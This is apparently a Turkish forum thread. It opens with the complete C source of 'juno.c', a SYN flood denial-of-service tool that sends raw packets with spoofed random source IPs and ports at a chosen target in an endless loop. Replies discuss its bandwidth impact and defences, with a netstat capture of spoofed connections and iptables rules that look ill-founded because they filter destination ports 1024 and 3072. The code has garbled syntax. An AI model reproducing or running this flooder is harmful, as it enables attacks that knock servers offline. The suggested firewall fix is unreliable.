Juno.c

char about[] = "juno.c by Darkcode of DALnet\n"; 

/* 
for best results, compile with: 
gcc -O2 juno.c -o juno 

thanks to bleach for releasing this for me, I'm too lazy to do it myself 

P.S I'd just like to send out a big "get out of the closet" to malkman, 
for making useless mods to this source that actually make it *less* 
effective. Get a life man. 
*/ 

#include <stdio.h> 
#include <netinet/in.h> 
#include <netdb.h> 
#include <sys/time.h> 
#include <sys/types.h> 
#include <unistd.h> 
#include <stdlib.h> 
#include <signal.h> 

#define USELESS_INFO 
#define EMULATE_WINDOWS /* EMULATE_WINDOWS or EMULATE_LINUX */ 
#define RANDOMIZE_SOURCE_IP /* random source ips */ 
#define RANDOMIZE_SOURCE_PORT /* random source ports */ 
#undef DELAY 1000 /* microsecond delay, undef for none */ 

/* nothing beyond here is useful to people who can't program */ 

#ifndef EMULATE_WINDOWS 
# ifndef EMULATE_LINUX 
# define EMULATE_WINDOWS 1 
# endif 
#endif 

struct syn { 
unsigned char verihl; 
unsigned char tos; 
unsigned short len; 
unsigned short id; 
unsigned short flg_ofs; 
unsigned char ttl; 
unsigned char proto; 
unsigned short ipsum; 
unsigned long src; 
unsigned long dst; 
unsigned short sport; 
unsigned short dport; 
unsigned long seq; 
unsigned long ack_seq; 
unsigned char offset; 
unsigned char flags; 
unsigned short win; 
unsigned short tcpsum; 
unsigned short urgptr; 
#ifdef EMULATE_WINDOWS 
char opt[8]; 
#else 
# ifdef EMULATE_LINUX 
char opt[20]; 
# endif 
#endif 
}; 

int resolve(char *name,unsigned long *ip) { 
struct hostent *host; 

if ((*ip=inet_addr(name)) == INADDR_NONE) { 
if (!(host=gethostbyname(name))) return(-1); 
*ip=((struct in_addr *)host->h_addr)->s_addr; 
} 
return(0); 
} 

int getsock(****) { 
int s = socket(PF_INET,SOCK_RAW,6),one=1; 

if(s<1) return(0); 
if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) return(0); 
return(s); 
} 

int getport(char *s, unsigned short *out) 
{ 
char const *p; 
int n; 

if(!*s) return(-1); 
for (p=s;*p;p++) if(*p<'0'||*p>'9' return(-2); 
if(p-s>5) return(-3); 
if(((n=atoi(s))>65535) || (n<0)) return(4); 
*out=htons(n); 
return(0); 
} 

**** prep_syn(struct syn *syn) { 
syn->verihl = 69; 
syn->len = htons(sizeof(struct syn)); 
syn->flg_ofs = 64; 
syn->proto = 6; 
syn->flags = 2; 
#ifdef EMULATE_WINDOWS 
syn->ttl = 128; 
syn->offset = 112; 
syn->win = htons(8192); 
syn->opt[0] = 2; 
syn->opt[1] = 4; 
syn->opt[2] = 5; 
syn->opt[3] = 0xB4; 
syn->opt[4] = 1; 
syn->opt[5] = 1; 
syn->opt[6] = 4; 
syn->opt[7] = 2; 
#else 
# ifdef EMULATE_LINUX 
syn->tos = 16; 
syn->ttl = 64; 
syn->offset = 160; 
syn->win = htons(15536); 
syn->opt[0] = 0x02; 
syn->opt[1] = 0x04; 
syn->opt[2] = 0x0F; 
syn->opt[3] = 0x2C; 
syn->opt[4] = 0x04; 
syn->opt[5] = 0x02; 
syn->opt[6] = 0x08; 
syn->opt[7] = 0x0A; 
syn->opt[9] = 0x05; 
syn->opt[10] = 0x27; 
syn->opt[11] = 0x2D; 
syn->opt[13] = 0x05; 
syn->opt[14] = 0x27; 
syn->opt[15] = 0x2D; 
syn->opt[16] = 0x01; 
syn->opt[17] = 0x03; 
syn->opt[18] = 0x03; 
# endif 
#endif 
} 

int starttime,outcount=0; 

int xmit_syn(struct syn *syn,int sock,struct sockaddr_in *targ) { 
register int count = (sizeof(struct syn)-20) >> 1,sum; 
register unsigned short *p = &syn->sport; 

#ifdef RANDOMIZE_SOURCE_IP 
syn->src = random(); 
#endif 
syn->id = 1+255*((random()%256)|0xFF); 
#ifdef RANDOMIZE_SOURCE_PORT 
syn->sport = htons(1024 + (random() & 2048)); 
#endif 
syn->seq = random(); 
syn->ack_seq = random(); 
syn->tcpsum = 0; 
sum = (syn->src >> 16) + (syn->src & 0xffff) + (syn->dst >> 16) + 
(syn->dst & 0xffff) + 1536 + htons(count << 1); 
while(count--) sum += *p++; 
sum = (sum >> 16) + (sum & 0xffff); 
syn->tcpsum = ~(sum += (sum >> 16)); 

outcount++; 

return(sendto(sock,syn,sizeof(struct syn),0,targ,sizeof(struct sockaddr_in))); 
} 

#ifdef RANDOMIZE_SOURCE_IP 
# ifdef RANDOMIZE_SOURCE_PORT 
# define TARGET_IP_INDEX 1 
# else 
# define SOURCE_PORT_INDEX 1 
# define TARGET_IP_INDEX 2 
# endif 
#else 
# ifdef RANDOMIZE_SOURCE_PORT 
# define TARGET_IP_INDEX 2 
# else 
# define SOURCE_PORT_INDEX 2 
# define TARGET_IP_INDEX 3 
# endif 
#endif 

**** sig_proc(int signum) { 
int ctime=time(NULL); 
printf("\n -- statistics -----------------------\n"; 
printf(" packets sent: %d\n",outcount); 
printf(" bytes sent: %d\n",outcount * sizeof(struct syn)); 
printf(" seconds active: %d\n",ctime-starttime); 
printf(" average bytes/second: %d\n",(outcount * sizeof(struct syn))/(ctime-starttime)); 
printf(" -------------------------------------\n"; 
exit(1); 
} 

int main(int argc,char *argv[]) { 
struct syn syn; 
struct sockaddr_in targ; 
int sock; 

bzero(&syn,sizeof(struct syn)); 

if(argc<TARGET_IP_INDEX+2) { 
fprintf(stderr,"Syntax: %s ",argv[0]); 
#ifndef RANDOMIZE_SOURCE_IP 
fprintf(stderr,"<source ip> "; 
#endif 
#ifndef RANDOMIZE_SOURCE_PORT 
fprintf(stderr,"<source port> "; 
#endif 
fprintf(stderr,"<target ip> <target port>\n"; 
exit(1); 
} 

if(!(sock=getsock())) { 
fprintf(stderr,"Failed to create socket\n"; 
exit(2); 
} 

#ifndef RANDOMIZE_SOURCE_IP 
if(resolve(argv[1],&syn.src)) { 
fprintf(stderr,"Invalid source ip (%s)\n",argv[1]); 
exit(3); 
} 
#endif 

#ifndef RANDOMIZE_SOURCE_PORT 
if(getport(argv[SOURCE_PORT_INDEX],&syn.sport)) { 
fprintf(stderr,"Invalid source port (%s)\n",argv[SOURCE_PORT_INDEX]); 
exit(4); 
} 
#endif 

if(resolve(argv[TARGET_IP_INDEX],&syn.dst)) { 
fprintf(stderr,"Invalid target ip (%s)\n",argv[TARGET_IP_INDEX]); 
exit(5); 
} 

if(getport(argv[TARGET_IP_INDEX+1],&syn.dport)) { 
fprintf(stderr,"Invalid target port (%s)\n",argv[TARGET_IP_INDEX+1]); 
exit(6); 
} 

#ifdef USELESS_INFO 
printf("%s%s",about,"death"; 
# ifndef RANDOMIZE_SOURCE_IP 
printf(" from %s:",inet_ntoa(syn.src)); 
# ifndef RANDOMIZE_SOURCE_PORT 
printf("%d",ntohs(syn.sport)); 
# else 
printf("random "; 
# endif 
# else 
# ifndef RANDOMIZE_SOURCE_PORT 
printf("random:%d",ntohs(syn.sport)); 
# endif 
# endif 
printf(" to %s:%d\n",inet_ntoa(syn.dst),ntohs(syn.dport)); 
#endif 
targ.sin_addr.s_addr = syn.dst; 
targ.sin_port = syn.dport; 
targ.sin_family = AF_INET; 

srandom(time(NULL)); 

starttime = time(NULL); 
while(time(NULL) == starttime) usleep(1000); 

signal(SIGHUP,&sig_proc); 
signal(SIGINT,&sig_proc); 
signal(SIGQUIT,&sig_proc); 
signal(SIGILL,&sig_proc); 
signal(SIGABRT,&sig_proc); 
signal(SIGFPE,&sig_proc); 
// signal(SIGKILL,&sig_proc); 
signal(SIGSEGV,&sig_proc); 
signal(SIGPIPE,&sig_proc); 
signal(SIGALRM,&sig_proc); 
signal(SIGTERM,&sig_proc); 
signal(SIGUSR1,&sig_proc); 
signal(SIGUSR2,&sig_proc); 
signal(SIGCHLD,&sig_proc); 
signal(SIGCONT,&sig_proc); 
// signal(SIGSTOP,&sig_proc); 
signal(SIGTSTP,&sig_proc); 
signal(SIGTTIN,&sig_proc); 
signal(SIGTTOU,&sig_proc); 

prep_syn(&syn); 
while(1) { 
if(xmit_syn(&syn,sock,&targ)!=sizeof(struct syn)) { 
fprintf(stderr,"failed to send packet\n"; 
exit(7); 
} 
#ifdef DELAY 
usleep(DELAY); 
#endif 
} 
}

expolit derlemesine bakarsan. .httacces iLe engellebiLir bence.
port 80'e direk yapiLdigi için exstra şifre koymayi dene ßi.

apacheyi indirmese bile hattı şişireceğinden yine problem olur dc açısından ama şu şifreleme olayını bi deneyeyim bakalım sonucu yazarım

juno mu ip spoofing etmiyor ? Random ipleri bi tarafından uydurup uydurup yolluyor işte.

maalesef şifreleme falanda yemiyor apache anında kilit

problem junonun çalıştırıldığı server ipini bulmakta ama o da nasıl yapılır bilemiyorum

port yaniltma YapilabiLse engellenir

Merhabalar : Kesinlikle dogru 1 bilgi , Juno kod yapisi itibari ile otomatik sekilde random ipler uretmekte, dolayisi ile saldiri alan sunucunun eth0'sina gelen paketleri tcpdump ile incelediginizde alakasiz ip adresleri goruyorsunuz , hal boyle olunca sistem adminlerinin isi zorlasiyor , engellenemiyor mu ? , engelleniyor ama iptables yada ipfw ile pek mumkun degil , kisisel tecrubemi paylasmam gerekirse tcpdump ile inceledigimde paket lengh'lerinin (uzunluk ) normal paketlerden kisa veya uzun dustugunu gordum(bu 2 sunucununda lokasyonlarinin neresi oldugu vb bir takim seylerlede alakali) iptables'da lengh rulesi tanimlayarak kismi sekilde blocklanabilme ihtimali olsada , saldiri yuksek 1 trafik'e ulasacaginda iptables'inde inbound trafigi tamami ile karsilayamacagini varsayarsak suncuya erisim kacinilmaz olacak , sonuc ? , saglam 1 hardware firewall + hat kapasitesi lazim.

iyi calismalar.

çok güzel açıklamışsınız hocam zaten junonun etkisi kullanılan makinanın hattıyla doğrudan ilgili evinde linux pc ile hiç bir işe yaramaz ancak sağlam bir 100 mbitlik serverle hattı iyi olmayan bir server etkisiz hale getirilebiliyor özellikle Türkiyedeki serverlerde net çıkışı ortalama 3-5-10 mbit civarlarındayken juno ortalama 30-90 mbit saldırı gücüne ulaştığında apacheden önce hat şişiyor yurtdışındaki serverler içinse sadece hattın yüksek olması yetmiyor ( 1 gbit bile olsa ) apachenin kapanmaması içinde dediğiniz gibi fiziksel bir firewall şart

Merhabalar : 1gbit uplinkli saglam 1 sunucudan yapildiginda net 800mbit saldiri yapar , 5 tane bu tarz 1 sunucu olsa 8x5 = 4gbit yapar (tabi datacenter bu durumun anormal oldugunu anlar neticede datacenterin 20gbit hatti olsa 1/5'ini kullaniyorsunuz) dolayisi ile , cok yuksek 1 trafige erisecegi icin yurticindeki hic bir sunucu bu durumda acik kalamaz , hatta acik kalmak istemeye kalktiginda ethernet kablosunun cekildigini anlamasi gec olmayacaktir :=).Bir bilgi vermek gerekirse , 250.000$ lik bir firewall'iniz olsada , router'iniza aldiginiz trafik miktari cok onemlidir , insanlar surekli yanlis anliyor , firewall sizin sunucunuza gelen trafigi filtreler ve temiz trafik birakir iceriye , ama background'da kirli trafik surekli aktif'tir.Sizin datacenter'inizin bu kirli trafigi karsilayip karsilayamacagi onemli yani datacenterin 500mbit hat miktari var ama size gelen trafik 1gbit ise 250.000$'lik cihazin yapabilecegi hic birsey yok , yani dunyanin en iyi cihazini kullanin ama 10mbit hattiniz olsun hic bir ise yaramaz.Ondan dolayi yurticinde bu tur konularda verim alinamiyor.Yani ozetle firewall'a yaptiginiz yatirimdan daha fazlasini hat miktarina yapmak lazim.

Juno Saldırısı çözdük gibi. aklıma geldi arkadaşın softlayerdeki 1 gbit cisco firewall takılı sunucusunda denedim girecek mi içeri diye gayet rahatça girdi.fakat gözlemlediğim kadarı ile gelen ipler ;
tcp 0 0 ARKADASINIPSI:25 145.100.12.94:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 17.6.225.43:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 214.250.224.119:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 133.12.218.109:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 18.253.240.123:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 40.214.166.47:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 92.32.189.23:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 155.41.29.43:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 202.195.234.68:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 44.56.215.100:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 32.232.218.6:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 35.83.106.100:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 98.116.94.88:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 193.101.23.28:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 211.5.224.34:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 124.132.2.18:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 172.158.138.56:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 81.129.215.62:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 118.237.5.35:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 97.3.124.19:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 221.189.243.70:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 131.87.221.35:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 161.109.116.49:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 72.23.136.115:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 206.52.124.58:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 97.4.255.27:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 15.127.206.37:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 82.205.122.73:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 12.39.70.8:1024 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 60.98.95.4:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 122.205.163.93:3072 SYN_RECV
tcp 0 0 ARKADASINIPSI:25 173.65.205.104:3072 SYN_RECV


şeklinde 1024 ve 3072 portlarını kapadık mı juno saldırısı ile gelen bir IP içeri girmiyor deneyip test ettik. Komut ;

iptables -A INPUT -p tcp --dport 1024 -j REJECT
iptables -A INPUT -p tcp --dport 3072 -j REJECT

sizde test edip varsa başka bi sorunuz buradan sorabilirsiniz

iyi çalışmalar